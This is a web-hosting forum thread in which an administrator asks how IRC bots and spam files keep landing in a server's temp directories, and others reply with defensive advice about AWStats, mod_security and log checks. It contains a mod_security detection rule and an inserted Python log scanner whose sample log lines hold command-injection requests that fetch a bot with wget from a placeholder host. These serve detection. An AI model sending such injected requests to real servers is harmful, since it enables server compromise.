  1. #1
    Join Date
    Dec 2003
    Posts
    377

    Some "nobody" files sleep in my /var/tmp, /tmp, /dev/shm

    My server is cPanel + Fedora Core 2. I host around 200 websites on one server, but most of them are inactive.

    I have been facing a problem recently. I check /var/tmp, /tmp, /dev/shm every day, and I usually find "nobody" files like bot, eggdrop and spam files appearing in /var/tmp, /tmp, /dev/shm. I think they come from vulnerable website scripts.

    I am unable to log in to the server every time to delete them. Does anyone have an idea how to trace where the files come from and fix the vulnerable website scripts? Do we have any method to protect against it?

  2. #2
    Join Date
    Mar 2003
    Location
    Canada
    Posts
    8,909
    I'm a bit confused, are you able to login to the server as root?
    Patrick William | RACK911 Labs | Software Security Auditing
    400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com

    www.HostingSecList.com - Security notices for the hosting community.

  3. #3
    Join Date
    Dec 2003
    Posts
    377
    Yes, I am able to log in as root.

    I guess the nobody files came from users' websites, for example back doors or vulnerable PHP scripts.

  4. #4
    Join Date
    Nov 2005
    Location
    BC, Canada
    Posts
    773
    Kill the processes if they're running, delete the files, patch Apache if needed, and check the logs to see which script was exploited to download the files. Look in Apache's access_log for "wget" and you'll probably find the command sent to an insecure script.
    || Higher Intellect || Half a million documents and climbing.
    || CupidClick Dating || Just for Canadians.

  5. #5
    Secure the tmp directory and get mod_security.
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  6. #6
    Join Date
    Nov 2003
    Location
    Amidst several dimensions
    Posts
    4,321
    Apparently someone put an IRC utility on your server through a vulnerability. Check AWStats; it was once notorious for such exploitation.

  7. #7
    Join Date
    Mar 2003
    Location
    Canada
    Posts
    8,909
    Quote Originally Posted by unity100
    Apparently someone put an IRC utility on your server through a vulnerability. Check AWStats; it was once notorious for such exploitation.
    Yeah, every day I always get scanned for that flaw. Laugh.
    Patrick William | RACK911 Labs | Software Security Auditing
    400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com

    www.HostingSecList.com - Security notices for the hosting community.

  8. #8
    Join Date
    Dec 2003
    Posts
    377
    Every day I stop Apache and use "lsof -u nobody" to find the nobody files. I feel quite tired of doing it and checking row by row. Any good ideas on how to monitor the security?

    Yes, mod_security is installed, but I don't know whether it works well or not.

  9. #9
    Join Date
    Dec 2003
    Posts
    377
    Quote Originally Posted by unity100
    Apparently someone put an IRC utility on your server through a vulnerability. Check AWStats; it was once notorious for such exploitation.

    May I know how to check AWStats over SSH?

  10. #10
    Quote Originally Posted by 0218
    Yes, mod_security is installed, but I don't know whether it works well or not.
    Do a search on Google and get some good rules for it.
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  11. #11
    Use this site to get some rules: http://gotroot.com/tiki-index.php?pa...security+rules

    I know there are some AWStats ones on there, like:

    #awstats probe
    SecFilterSelective THE_REQUEST "/awstats\.pl HTTP\/(0\.9|1\.0|1\.1)$"
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!
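    The two checks suggested above, looking for "wget" in Apache's access_log (#4) and for awstats.pl probes (#11), can be scripted instead of read row by row. This is an added example, not code posted in the thread; the log lines are constructed and the IPs and hostnames are placeholders.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined/common log prefix: client, ident, user, [time], "METHOD URI PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Indicators discussed in the thread: a download tool named inside the request (#4)
# and any request for awstats.pl, which the posted mod_security rule also matches (#11).
FETCH_RE = re.compile(r"\b(wget|curl)\b", re.IGNORECASE)
AWSTATS_RE = re.compile(r"/awstats\.pl(\?|$)", re.IGNORECASE)

# Constructed sample log (not real traffic); IPs are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2006:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Mar/2006:03:14:09 +0000] "GET /awstats/awstats.pl?configdir=wget%20http://example.invalid/bot HTTP/1.0" 200 211 "-" "libwww-perl/5.805"
198.51.100.9 - - [10/Mar/2006:03:14:10 +0000] "GET /awstats.pl HTTP/1.0" 404 300 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Mar/2006:03:15:01 +0000] "GET /gallery/view.php?img=wget%20http://example.invalid/bot HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

def classify_request(uri):
    """Return the reasons a (URL-decoded) request URI looks like script abuse."""
    decoded = unquote(uri)
    reasons = []
    if AWSTATS_RE.search(decoded):
        reasons.append("awstats.pl probe")
    if FETCH_RE.search(decoded):
        reasons.append("download tool in request")
    return reasons

def scan_access_log(text):
    """Return (client_ip, status, script_path, reasons) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Apache access-log format
        reasons = classify_request(m["uri"])
        if reasons:
            script = unquote(m["uri"]).split("?", 1)[0]
            hits.append((m["ip"], int(m["status"]), script, reasons))
    return hits

def exploited_scripts(text):
    """Count scripts that answered 200 to a request carrying a download tool:
    these are the candidate insecure scripts post #4 says to look for."""
    return Counter(script for _, status, script, reasons in scan_access_log(text)
                   if status == 200 and "download tool in request" in reasons)

if __name__ == "__main__":
    for ip, status, script, reasons in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {script}: {', '.join(reasons)}")
    print("likely exploited:", dict(exploited_scripts(SAMPLE_LOG)))
```

    Run it against the real file with `scan_access_log(open("/usr/local/apache/logs/access_log").read())`; a 404 on awstats.pl is only a probe, while a 200 with a download tool in the query names the script to fix.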

  12. #12
    Join Date
    Dec 2003
    Posts
    377
    Thank you

  13. #13
    Join Date
    Nov 2003
    Location
    Amidst several dimensions
    Posts
    4,321
    You are on cPanel. Check your version of AWStats through any site's AWStats utility. If yours is outdated, it's possible that your version is one of the ones that still has the security hole that allows rootkits, IRC bots or other malicious pieces into your var folder.
